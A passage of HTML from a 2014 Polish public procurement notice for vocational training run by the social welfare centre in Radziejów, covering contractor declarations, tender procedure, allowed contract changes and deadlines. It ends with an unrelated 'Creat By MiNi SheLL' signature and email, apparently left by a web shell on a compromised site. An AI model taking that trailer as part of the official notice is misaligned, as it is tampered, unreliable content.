<p>1) Oświadczenie Wykonawcy, że jest wpisany do rejestru instytucji szkoleniowych, prowadzonego przez Wojewódzki Urząd Pracy (właściwy dla danego wykonawcy) zgodnie z treścią art. 20 ust 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz.U. z 2008 r. poz. 415 z poźn. zm.)
2) Oświadczenie, że posiada odpowiedni sprzęt oraz urządzenia niezbędne do przeprowadzenia szkoleń</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazane są istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, chyba, że wystąpią okoliczności, które przemawiają za koniecznością zmiany postanowień umowy tj.:
- wystąpienia okoliczności powodujących konieczność zmiany osób które będą uczestniczyć   w wykonaniu przedmiotu zamówienia (przewidzianych w ofercie), na osoby o co najmniej równoważnych kwalifikacjach i doświadczeniu;
- W zakresie terminu wykonania zamówienia w przypadku wystąpienia obiektywnych czynników niezależnych od Zamawiającego lub Wykonawcy; 
w zakresie ilości kierowanych osób na poszczególne szkolenia zawodowe;
- wystąpienie konieczności zamiany podwykonawcy, powierzenia wykonania części zakresu umowy podwykonawcy lub zmiany zakresu wykonania części zamówienia przez podwykonawcę.
Powyższe okoliczności stanowią warunki zmiany umowy, o których mowa w art. 144 ust. 1 PZP w przypadku wystąpienia takiej okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ugradziejow.pl  Zakładka Pomoc Społeczna<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek  Pomocy Społecznej, ul. Kościuszki 58, 88-200 Radziejów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2014 godzina 13:00, miejsce: Gminny Ośrodek  Pomocy Społecznej, ul. Kościuszki 58, 88-200 Radziejów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program aktywizacji zawodowej w Gminie Radziejów.
Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com